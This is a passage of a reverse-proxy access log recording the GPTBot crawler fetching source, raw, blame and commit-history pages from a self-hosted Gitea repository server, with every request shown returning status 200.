- GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/types.ts" [Client 74.7.227.38] [Length 10810] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/types.ts" +[17/Feb/2026:13:21:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 11493] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html" +[17/Feb/2026:13:21:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/activity/quarterly" [Client 74.7.227.38] [Length 8593] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/activity" +[17/Feb/2026:13:21:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/activity/contributors" [Client 74.7.227.38] [Length 7603] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/activity" +[17/Feb/2026:13:21:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 10937] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs" +[17/Feb/2026:13:21:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 10968] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs" +[17/Feb/2026:13:21:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/README.md" [Client 74.7.227.38] [Length 10891] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest" +[17/Feb/2026:13:21:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/README.md" [Client 74.7.227.38] [Length 10889] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest" +[17/Feb/2026:13:21:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/main.py" [Client 74.7.227.38] [Length 19731] [Gzip 5.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest" +[17/Feb/2026:13:21:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/main.py" [Client 74.7.227.38] [Length 19733] [Gzip 5.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest" +[17/Feb/2026:13:21:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/README.md" [Client 74.7.227.38] [Length 10892] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest" +[17/Feb/2026:13:21:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/main.py" [Client 74.7.227.38] [Length 19734] [Gzip 5.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest" +[17/Feb/2026:13:21:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 17351] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest" +[17/Feb/2026:13:21:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 17350] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest" +[17/Feb/2026:13:21:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 17351] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest" +[17/Feb/2026:13:21:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/my_database.db" [Client 74.7.227.38] [Length 10861] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest" +[17/Feb/2026:13:21:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/my_database.db" [Client 74.7.227.38] [Length 10861] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest" +[17/Feb/2026:13:21:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/README.md" [Client 74.7.227.38] [Length 9907] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/README.md" +[17/Feb/2026:13:21:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/README.md" [Client 74.7.227.38] [Length 9907] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/README.md" +[17/Feb/2026:13:21:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/README.md" [Client 74.7.227.38] [Length 9940] [Gzip 2.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/README.md" +[17/Feb/2026:13:21:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/README.md" [Client 74.7.227.38] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/README.md" +[17/Feb/2026:13:21:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/README.md" [Client 74.7.227.38] [Length 9907] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/README.md" +[17/Feb/2026:13:21:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/README.md" [Client 74.7.227.38] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/README.md" +[17/Feb/2026:13:21:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/README.md" [Client 74.7.227.38] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/README.md" +[17/Feb/2026:13:21:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/README.md" [Client 74.7.227.38] [Length 9941] [Gzip 2.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/README.md" +[17/Feb/2026:13:21:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/README.md" [Client 74.7.227.38] [Length 9940] [Gzip 2.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/README.md" +[17/Feb/2026:13:21:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/main.py" [Client 74.7.227.38] [Length 9231] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/main.py" +[17/Feb/2026:13:21:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/main.py" [Client 74.7.227.38] [Length 9231] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/main.py" +[17/Feb/2026:13:21:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/main.py" [Client 74.7.227.38] [Length 22473] [Gzip 10.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/main.py" +[17/Feb/2026:13:21:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/main.py" [Client 74.7.227.38] [Length 9231] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/main.py" +[17/Feb/2026:13:21:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/main.py" [Client 74.7.227.38] [Length 22473] [Gzip 10.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/main.py" +[17/Feb/2026:13:21:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/main.py" [Client 74.7.227.38] [Length 22470] [Gzip 10.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/main.py" +[17/Feb/2026:13:21:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/main.py" [Client 74.7.227.38] [Length 9906] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/main.py" +[17/Feb/2026:13:21:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/main.py" [Client 74.7.227.38] [Length 9906] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/main.py" +[17/Feb/2026:13:21:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/main.py" [Client 74.7.227.38] [Length 9905] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/main.py" +[17/Feb/2026:13:21:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 9913] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/Gitea_Manual.md" +[17/Feb/2026:13:21:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 9913] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/Gitea_Manual.md" +[17/Feb/2026:13:21:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 9913] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/Gitea_Manual.md" +[17/Feb/2026:13:21:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/my_database.db" [Client 74.7.227.38] [Length 9917] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/my_database.db" +[17/Feb/2026:13:21:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/my_database.db" [Client 74.7.227.38] [Length 9917] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/my_database.db" +[17/Feb/2026:13:21:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 11904] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/Gitea_Manual.md" +[17/Feb/2026:13:21:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 11904] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/Gitea_Manual.md" +[17/Feb/2026:13:21:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/my_database.db" [Client 74.7.227.38] [Length 8192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/my_database.db" +[17/Feb/2026:13:21:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/my_database.db" [Client 74.7.227.38] [Length 8192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/my_database.db" +[17/Feb/2026:13:21:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/my_database.db" [Client 74.7.227.38] [Length 10860] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest" +[17/Feb/2026:13:21:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 11904] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/Gitea_Manual.md" +[17/Feb/2026:13:21:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/.gitignore" +[17/Feb/2026:13:21:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_stream_access.log" +[17/Feb/2026:13:21:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_stream_access.log" +[17/Feb/2026:13:21:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 10965] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" +[17/Feb/2026:13:21:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 10927] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs" +[17/Feb/2026:13:21:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 33591] [Gzip 6.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs" +[17/Feb/2026:13:21:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 31256] [Gzip 6.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs" +[17/Feb/2026:13:21:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 31284] [Gzip 6.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs" +[17/Feb/2026:13:21:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 38720] [Gzip 6.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs" +[17/Feb/2026:13:21:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/my_database.db" [Client 74.7.227.38] [Length 9915] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; 